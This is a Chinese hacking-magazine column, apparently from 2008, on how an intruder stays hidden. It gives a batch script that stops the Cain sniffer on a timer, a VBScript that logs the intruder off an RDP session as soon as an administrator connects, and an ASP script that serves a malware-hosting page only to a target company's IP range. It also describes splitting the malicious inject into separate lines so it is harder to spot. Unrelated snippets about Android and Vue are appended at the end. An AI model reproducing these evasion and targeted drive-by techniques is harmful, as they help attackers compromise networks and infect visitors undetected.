《***手冊200803》
我在***過程中注意到的細節之三
lcx前兩期中的專欄中,針對細節***這一專題,我分別寫了我在內網和注入中注意到的一些細節。其實***過程中,有時候難免會與管理員面對面,如何更好的隱蔽自己也是很重要的,一旦不注意,***工作往往前功盡棄。這期專欄中,我就如何隱蔽自己所做的一些工作,所注意到的細節來寫一下。
先來說一下嗅探吧。大家常用的工具是cain,用法大家都會了。但是cain在嗅探過程中,如果遇到流量較大的目標機,往往會把裝cain的主機搞死,從而引起管理員的注意。像有的時候,嗅了一陣後,就會把3389搞死。我也沒有更好的辦法,只能讓cain嗅一段時間後停止,再重新開始。如果每次都是手工去停止cain,有時候時間掌握的不及時,3389已經死掉了。其實解決這個問題很簡單,乙個簡單的批處理指令碼就可以了。指令碼內容如下: ★
ping 127.0.0.1 -n 5000>nul
taskkill /f /pid 4144 ★
上邊批處理指令碼中,5000是秒數,用來控制cain的嗅探時間。4144是cain的程序數,可以自己用tasklist查一下就知道了。這樣一來,你可以放心在嗅探這段時間內去做別的事了。
再來呢,用cain嗅探一般會在3389上,這時候如果碰到管理員登陸3389也不太好辦,我的好友netpatch寫過乙個終端監視指令碼,一旦發現有兩人同時登陸終端的話就登出自己。指令碼內容如下: ★
on error resume next
set arg=wscript.arguments
if arg.count=0 then
wscript.echo 「use:// cscript.exe fs.vbs port」
sleep 1000
wscript.quit
end if
tport=arg(0)
runs=false
while runs=false
dim oshell,oexec,strout,oregexp,matches,match,num,tport
set oshell = wscript.createobject(」wscript.shell」)
set oexec = oshell.exec(」netstat -an」)
set oregexp = new regexp
oregexp.pattern = 「tcp[\s]+[\d\.]+:」&tport&」[\s]+[\d\.]+:[\d]+[\s]+established」
oregexp.ignorecase = true
oregexp.global = true
do while not oexec.stdout.atendofstream
strout = strout & oexec.stdout.readline() & chr(13) & chr(10)
loop
set matches = oregexp.execute(strout)
num = 0
for each match in matches
num = num + 1
next
if num > 1 then
runs=true
oshell.run 「logoff」
end if
set matches = nothing
set oregexp = nothing
set oexec = nothing
set oshell = nothing
wend ★
用此指令碼,登陸終端時開啟就可以了,這也是乙個比較好的隱藏自己的辦法。
最後來說一下掛馬。掛馬的隱蔽方法也有很多,以前**上講過幾期。如果只是盲目的掛馬多搞幾台肉雞的話,那個隨便你了。但是有時候我們***了乙個公司的 web站,目標卻是他們的內網。這時候你掛馬可能會掛出太多的無用機器,如果你知他們公司內網出口的ip段的話,我們可以限制一下ip段使其更有針對性。這個asp指令碼如下:
<%
」獲取訪問者的位址
ip=request.servervariables(」remote_addr」)
『允許的ip位址段為
allowip1=」221.221.221.1″
allowip2=」221.221.221.254″
if checkip(ip,allowip1,allowip2)=true then
response.write 「你掛馬的頁面」
end if
function checkip(ip,allowip1,allowip2)
dim check(4)
checkip=false
ipstr=split(ip,」.」)
allow1=split(allowip1,」.」)
allow2=split(allowip2,」.」)
if cint(allow1(0))>cint(allow2(0)) then 」判斷ip位址段是否合法
response.write 「禁止訪問」
exit function
end if
for i=0 to ubound(ipstr)
if cint(allow1(i))cint(allow2(i)) then
check(i)=false
checkip=false
exit for
else
check(i)=true
checkip=true
end if
end if
end if
else
if cint(allow1(i))>cint(ipstr(i)) or cint(allow1(i))ubound(ipstr) then
exit for
end if
else
check(i)=true
end if
end if
next
if (check(0)=true and check(1)=true and check(2)=true and check(3)=false) and (cint(allow2(2))>cint(ipstr(2))) then
checkip=true
end if
end function
%>
這個指令碼也許考慮得不太周到,但是我覺得足夠用了。掛馬的隱蔽方法也有很多,我最常用的是**分隔法。記得劍心有篇文章,提到過最短的跨站方法,我們也可以用這種方法來掛馬的。好比常規掛馬語句拆分一下轉換為: ★
★這樣轉換的好處是上邊的每一行可以分開插入在同一頁面不同行中,這樣一來就會隱蔽一點了。當然如何更好的隱蔽自己有很多不同的辦法,各人各有巧妙不同。這篇文章只是拋磚引玉,能引起大家的思考我就心滿意足了。
我在 過程中注意到的細節(一)
我在 過程中注意到的細節 一 lcx 細節決定成敗,不但對於寫程式 甚至人生都是如此。談人生就有點深奧了,還是來談談 吧。記得很久前有一位同事,注入的時候,在sa許可權什麼命令都能執行的情況下竟然 花費了三天左右的時間,為什麼呢?這是因為他在nbsi下輸了個time命令,想看下伺服器的時間,結果命令...
開發過程中注意事項及優化(持續更新 )
把每一件簡單的事做好,就不簡單了 把每一件平凡的事完成,就不平凡了!這篇文章會慢慢更新的,自己剛接觸到安卓開發,注意事項以及效能優化都會更新,希望對讀者有一定的幫助。1.在handler執行非同步資訊傳遞的時候,當我們在非ui執行緒中,需要把傳遞的資訊sendmessage給主線程,這個時候我們需要...
vue cli4 x使用過程中注意事項
1 引用問題 一 放在src檔案的assets下 1 直接引用時使用相對路徑 vue logo src assets logo.png 2 動態引用時用require imgurl alt data js中引用要用require 方法3 css背景 home二 放在src檔案的靜態資料夾public...